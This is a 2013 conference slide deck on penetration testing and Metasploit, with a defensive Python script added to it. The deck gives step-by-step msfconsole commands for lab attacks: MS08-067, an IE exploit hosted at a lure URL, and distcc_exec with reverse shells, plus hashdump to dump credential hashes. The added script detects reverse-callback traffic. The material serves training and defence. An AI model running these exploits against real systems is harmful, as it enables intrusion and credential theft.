PENETRATION TESTING AND METASPLOIT BASIC Presented by Syarif Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track basic overview
• Information Gathering & Port Scan ( Demo)
• Metasploit Basics & Meterpreter
• Challenge ;)
Whoami
• Just myself: http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecturer & Assistant Manager
• CyberCrime Investigator
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1)
• A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of a computer system / network
• Practise (attacking) an IT system the way a ‘hacker’ does
• Find security holes (weaknesses)
• Bypass security mechanisms
• Compromise an organization’s IT system security
Must have permission from the IT system owner!
Illegal activity puts you in jail
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
• Information Gathering
• Vulnerability Analysis
• Exploitation
• Post Exploitation
• Reporting
<< back|track overview
• The Most Advanced Linux Security Distribution
• Open Source & Always Will Be
• Developed for Security Professionals
• Real World Pentesting Tools
<< back|track overview
• Watch the Video ! :)
What’s Metasploit?
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors that extend its exploits, payloads, encoders, ...
• Create and execute more advanced attacks
• Ruby based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
MSFconsole (screenshot)
MSFcli (screenshot)
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute (a few commands to be executed on the target system) *1)
• Shellcode : a set of instructions used as the payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
How does exploitation work?
• 1. Attacker sends exploit + payload to the vulnerable server
• 2. Exploit runs, then payload runs
• 3. Upload / download data
Traditional Pentest vs Metasploit
Traditional Pentest :
• Public exploit gathering
• Change offsets
• Replace shellcode
Metasploit for Pentest :
• Load Metasploit
• Choose the target OS
• Use exploit
• Set payload
• Execute
Meterpreter
• Used as a payload after a vulnerability is exploited *1)
• Improves post exploitation
Meterpreter
• Exploiting a vulnerability → select meterpreter as the payload → meterpreter shell
Meterpreter commands (screenshots)
Pentest Scenario
• attacker → vulnerable OS on VMware (* : Ubuntu 8.04 Metasploitable)
Pentest Scenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
• startx
OS in the Lab
• BackTrack 5 R3
• IP address : 172.16.150.169
• Windows XP SP2
• IP address : 172.16.150.165
• Windows 2003 Server
• IP address : 172.16.150.167
• Windows 7
• IP address : 172.16.150.170
• Ubuntu Linux 8.04 (Metasploitable)
• IP address : 172.16.150.171
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• meterpreter > getuid
• meterpreter > hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://172.16.150.169:80/miyabi-hot.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• msf > search distcc
• msf > use exploit/unix/misc/distcc_exec
• msf exploit(distcc_exec) > show payloads
• msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
• msf exploit(distcc_exec) > show options
• msf exploit(distcc_exec) > set RHOST 172.16.150.171
• msf exploit(distcc_exec) > set LHOST 172.16.150.169
• msf exploit(distcc_exec) > exploit
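Added example (not from the slides): seen from the defender's side, the "How does exploitation work?" diagram and every lab scenario above leave the same two-leg trace on the network: a connection to the vulnerable service (SMB port 445 for ms08_067_netapi, distcc port 3632 for distcc_exec; the port numbers are an assumption of this example, the slides name only the modules), followed within seconds by the victim opening a connection back to the same peer, to Metasploit's default reverse_tcp port 4444 or to whatever LPORT was set (443 in the Windows 7 scenario). The Python script below correlates the two legs over constructed firewall-style connection records that reuse the lab's IP addresses; the record format, the port-to-service map and the 120-second window are this example's own choices.

```python
"""Correlate inbound service hits with reverse connections back to the same peer.

Added, illustrative example: the record format is constructed for this slide deck's
lab network; a real deployment would read firewall or NetFlow exports instead.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Ports the attacker has to reach first. The slides name only the modules; the port
# numbers (445 for SMB, 3632 for distcc) are an assumption of this example.
SERVICE_PORTS = {445: "smb", 3632: "distcc"}

# How long after the inbound hit a callback still counts as related (assumed value).
CALLBACK_WINDOW = timedelta(seconds=120)

# Constructed connection records: "<ISO timestamp> <src> -> <dst>:<dport>".
# The addresses are the ones listed on the "OS in the Lab" slide.
LOG = """\
2013-04-25T10:00:01 172.16.150.169 -> 172.16.150.165:445
2013-04-25T10:00:03 172.16.150.165 -> 172.16.150.169:4444
2013-04-25T10:05:00 172.16.150.170 -> 172.16.150.165:445
2013-04-25T10:05:30 172.16.150.165 -> 172.16.150.171:80
2013-04-25T10:10:00 172.16.150.169 -> 172.16.150.171:3632
2013-04-25T10:10:02 172.16.150.171 -> 172.16.150.169:4444
2013-04-25T11:00:00 172.16.150.169 -> 172.16.150.167:445
2013-04-25T11:30:00 172.16.150.167 -> 172.16.150.169:4444
"""


@dataclass(frozen=True)
class Conn:
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_line(line: str) -> Conn:
    """Parse one constructed record into a Conn."""
    ts, src, arrow, target = line.split()
    if arrow != "->":
        raise ValueError(f"unexpected record: {line!r}")
    dst, port = target.rsplit(":", 1)
    return Conn(datetime.fromisoformat(ts), src, dst, int(port))


def find_callbacks(log, window=CALLBACK_WINDOW):
    """Return (victim, peer, service, callback_port) for every inbound hit on a watched
    service that is followed, within `window`, by the victim connecting back to that peer.

    Step 1 of the slide's diagram is the inbound hit (exploit + payload delivered);
    the callback is the payload running and reporting to the attacker's listener.
    """
    lines = log.splitlines() if isinstance(log, str) else log
    conns = sorted((parse_line(l) for l in lines if l.strip()), key=lambda c: c.ts)
    alerts = []
    for i, hit in enumerate(conns):
        service = SERVICE_PORTS.get(hit.dport)
        if service is None:
            continue  # not a connection to a watched service
        for later in conns[i + 1:]:
            if later.ts - hit.ts > window:
                break  # records are time-ordered, so nothing later can match
            # Direction reversed: the service host now initiates toward the same peer.
            if later.src == hit.dst and later.dst == hit.src:
                alerts.append((hit.dst, hit.src, service, later.dport))
                break
    return alerts


if __name__ == "__main__":
    for victim, peer, service, port in find_callbacks(LOG):
        print(f"{victim}: {service} hit from {peer}, then callback to {peer}:{port}")
```

Run as-is it reports the Windows XP (SMB) and Metasploitable (distcc) chains and stays quiet on the two decoys: the 445 connection from .170 is never answered by a connection back to .170, and the Windows 2003 pair is 30 minutes apart, outside the window (widen `window` and it is reported too, which is the trade-off to tune against real traffic). The ms11_003_ie_css_import chain is the one this rule cannot see, because both legs are started by the victim (it fetches the URL from SRVHOST:80, then calls back to LPORT 443); catching that one needs proxy or DNS logs, for example flagging browser requests to a bare IP address that are followed by a new outbound connection to the same host.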
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References
• 1. Metasploit: The Penetration Tester’s Guide. David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
Challenge in 45 minutes :)
• Connect your Windows OS to the TP-LINK access point over DHCP
• BackTrack 5 R3 VMware setting :
• Network adapter : Bridged
• Get 4 pictures by yourself & shut down the targets (if you can :p)
• Win the indobacktrack polo T-shirt